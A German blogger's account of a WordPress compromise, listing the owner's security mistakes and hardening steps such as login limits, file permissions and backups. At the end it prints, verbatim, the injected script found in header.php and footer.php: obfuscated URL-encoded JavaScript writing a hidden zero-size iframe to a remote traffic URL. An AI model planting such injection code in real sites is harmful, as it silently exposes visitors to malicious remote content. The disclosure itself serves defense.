folgender Code wurde bei mir durch schlampige Absicherung der WordPress-Installation installiert (April 2013)
Der Code wurde in HEADER.PHP und in FOOTER.PHP injiziert und verweist auf einen Russischen Server, welcher bei Bedarf (offene Seite? Fehlender Virus-Schutz …) weitere Skripte aktiviert und ev. Trojaner runterladet.
Der Code verweisst auf eine Adresse „Booghoot.ru“ oder so.
Dies passierte in meinen Websiten:
- ganzemedizin.at
- aerzte4840.at
Meine Fehler:
es existierte ein User ADMIN
der gehört gelöscht, alle hacking-versuche finden über diesen User statt, kann ich jetzt sagen weil ein Plugin dies protokolliert
es gab keine Registrierungs-Begrenzung
mittlerweile kann man sich auf meiner WordPress-Seite nicht mehr registrieren. Weil ich ja eh keine externen Schreiber zulasse ist dies sinnvoll – dies stellt man ein in den Grund- „Einstellungen“ von WordPress
es gab keine Anmeldungs-Begrenzung
mittlerweile kann man sich nur 2 x einloggen. Wenn man sich fehl-einloggt wird man gesperrt, mehr als 4 fehlversuche führen zu einer dauerhaften Sperrung.
Das tool dafür heisst: Limit Login Attempts
die wichtigsten Seiten waren auf dem Server nicht schreibgeschützt
ich habe mittlerweile die Dateien config-wp.php, header.php, …… mit #0444 Permission geschützt.
Trotzdem weiterhin tausende Logon-Versuche von multiplen IP-Adressen, d.h. ein ganzes Botnetz versucht meine website zu hacken. Vermutlich haben meine Pharmakritischen Artikel hier einen der oberen veranlasst „putzts den weg“ auszusprechen.
daher:
verstecken der Login-Seite auf eine geheime Adresse (Juni 2014)
http://wordpress.org/support/topic/rename-wp-admin-without-renaming-it-htaccess-rewrite
regelmässige BACKUPS
diese laufen über das Plugin BackWPup, die Backups der Datenbank und Seite werden dann anschliessend regelmässig per FTP auf einen meiner vielen anderen Server rüberkopiert, sodass ich die Website täglich abgesichert habe und jederzeit den aktuellen Zustand wiederherstellen kann.
Nachfolgend der injizierte HACKER Skript im HEADER
<script type=“text/javascript“>
<!–
document.write(unescape(‚%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6F%6F%67%68%6F%6F%74%2E%63%6F%6D%2F%74%72%61%66%66%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A‘));
//–>
</script><script type=“text/javascript“>
<!–
document.write(unescape(‚%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6F%6F%67%68%6F%6F%74%2E%63%6F%6D%2F%74%72%61%66%66%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A‘));
//–>
Hier der Hacker-Skript in FOOTER.PHP
<script type=“text/javascript“>
<!–
document.write(unescape(‚%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6F%6F%67%68%6F%6F%74%2E%63%6F%6D%2F%74%72%61%66%66%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A‘));
//–>
</script><script type=“text/javascript“>
<!–
document.write(unescape(‚%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%62%6F%6F%67%68%6F%6F%74%2E%63%6F%6D%2F%74%72%61%66%66%2F%67%6F%2E%70%68%70%3F%73%69%64%3D%31%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A‘));
//–>
</script>
